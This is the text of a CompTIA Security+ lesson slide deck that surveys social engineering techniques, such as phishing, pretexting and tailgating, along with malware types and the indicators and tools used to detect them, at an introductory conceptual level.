reflection
Identifying Social Engineering and Malware
Lesson 4
1
Compare and Contrast Social Engineering Techniques
Topic 4A
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
2
2
1.1 Compare and contrast different types of social engineering techniques
Syllabus Objectives Covered
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
3
Social Engineering
“Hacking the human”
Purposes of social engineering
Reconnaissance and eliciting information
Intrusion and gaining unauthorized access
Many possible scenarios
Persuade a user to run a malicious file
Contact a help desk and solicit information
Gain access to premises and install a monitoring device
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
4
4
Social Engineering Principles
Reasons for effectiveness
Familiarity/liking
Establish trust
Make request seem reasonable and natural
Consensus/social proof
Exploit polite behaviors
Establish spoofed testimonials or contacts
Authority and intimidation
Make the target afraid to refuse
Exploit lack of knowledge or awareness
Scarcity and urgency
Rush the target into a decision
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
5
5
Impersonation and Trust
Impersonation
Pretend to be someone else
Use the persona to charm or to intimidate
Exploit situations where identity-proofing is difficult
Pretexting
Using a scenario with convincing additional detail
Trust
Obtain or spoof data that supports the identity claim
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
6
Dumpster diving
Steal documents and media from trash
Tailgating
Access premises covertly
Follow someone else through a door
Piggy backing
Access premises without authorization, but with the knowledge of an employee
Get someone to hold a door open
Dumpster Diving and Tailgating
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
7
7
Identity fraud
Impersonation with convincing detail and stolen or spoofed proofs
Identity fraud versus identity theft
Invoice scams
Spoofing supplier details to submit invoices with false account details
Credential theft and misuse
Credential harvesting
Shoulder surfing
Lunchtime attack
Identity Fraud and Invoice Scams
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
8
8
Phishing, Whaling, and Vishing
Trick target into using a malicious resource
Spoof legitimate communications and sites
Spear phishing
Highly targeted/tailored attack
Whaling
Targeting senior management
Vishing
Using a voice channel
SMiShing
Using text messaging
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
9
Spam, Hoaxes, and Prepending
Spam
Unsolicited email
Email address harvesting
Spam over Internet messaging (SPIM)
Hoaxes
Delivered as spam or malvertising
Fake A-V to get user to install remote desktop software
Phone-based scams
Prepending
Tagging email subject line
Can be used by threat actor as a consensus or urgency technique
Can be added by mail systems to warn users
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
10
Pharming and Credential Harvesting
Passive techniques have less risk of detection
Pharming
Redirection by DNS spoofing
Typosquatting
Use cousin domains instead of redirection
Make phishing messages more convincing
Watering hole
Target a third-party site
Customer, supplier, hobbies, social media...
Credential harvesting
Attacks focused on obtaining credentials for sale rather than direct intrusion
Attacks focused on obtaining multiple credentials for single company
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
11
Influence Campaigns
Sophisticated threat actors using multiple resources to change opinions on a mass scale
Soft power
Leveraging diplomatic and cultural assets
Hybrid warfare
Use of espionage, disinformation, and hacking
Social media
Use of hacked accounts and bot accounts
Spread rumor and reinforce messaging
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
12
Social Engineering Techniques
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
13
Review Activity
Analyze Indicators of Malware-based Attacks
Topic 4B
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
14
14
1.2 Given a scenario, analyze potential indicators to determine the type of attack
4.1 Given a scenario, use the appropriate tool to assess organizational security (Cuckoo only)
Syllabus Objectives Covered
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
15
Classification by vector or infection method
Viruses and worms
Spread within code without authorization
Trojans
A malicious program concealed within a benign one
Potentially unwanted programs/applications (PUPs/PAPs)
Pre-installed “bloatware” or installed alongside another app
Not completely concealed, but installation may be covert
Also called grayware
Classification by payload
Malware Classification
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
16
16
Computer Viruses
Rely on some sort of host file or media
Non-resident/file infector
Memory resident
Boot
Script/macro
Multipartite
Polymorphic
Vector for delivery
Screenshot used with permission from Microsoft.
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
17
Computer Worms and Fileless Malware
Early computer worms
Propagate in memory/over network links
Consume bandwidth and crash process
Fileless malware
Exploiting remote execution and memory residence to deliver payloads
May run from an initial script or Trojan
Persistence via the registry
Use of shellcode to create backdoors and download additional tools
“Living off the land” exploitation of built-in scripting tools
Advanced persistent threat (APT)/advanced volatile threat (AVT)/ low observable characteristics (LOC)
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
18
Spyware, Adware, and Keyloggers
Tracking cookies
Adware (PUP/grayware)
Changes to browser settings
Spyware (malware)
Log all local activity
Use of recording devices and screenshots
Redirection
Keylogger
Software and hardware
Screenshot used with permission from ActualKeylogger.com.
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
19
Backdoors and Remote Access Trojans
Backdoor malware
Remote access trojan (RAT)
Bots and botnets
Command & control (C2 or C&C)
Backdoors from misconfiguration and unauthorized software
Screenshot used with permission from Wikimedia Commons by CCAS4.0 International.
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
20
Rootkits
Local administrator versus SYSTEM/root privileges
Replace key system files and utilities
Purge log files
Firmware rootkits
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
21
Ransomware, Crypto-Malware, and Logic Bombs
Ransomware
Nuisance (lock out user by replacing shell)
Crypto-malware
High impact ransomware (encrypt data files or drives)
Cryptomining/crypojacking
Hijack resources to mine cryptocurrency
Logic bombs
Image by Wikimedia Commons.
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
22
Malware Indicators
Browser changes or overt ransomware notification
Anti-virus notifications
Endpoint protection platforms and next-gen A-V
Behavior-based analysis
Sandbox execution
Cuckoo
Resource utilization/consumption
Task Manager and top
File system changes
Registry
Temp files
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
23
23
Process Analysis
Signature-based detection is failing to identify modern APT-style tools
Network and host behavior anomalies drive detection methods
Running process analysis
Process Explorer
Logging activity
System Monitor
Network activity
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
24
Screenshot: Process Explorer docs.microsoft.com/en-us/sysinternals.
Indicators of Malware-Based Attacks
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
25
Review Activity
Assisted Lab
Installing, Using, and Blocking a Malware-based Backdoor
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
26
Lab Activity
Applied Lab
Performing Network Reconnaissance and Vulnerability Scanning
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
27
Lab Activity
Summary
Lesson 4
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
28
28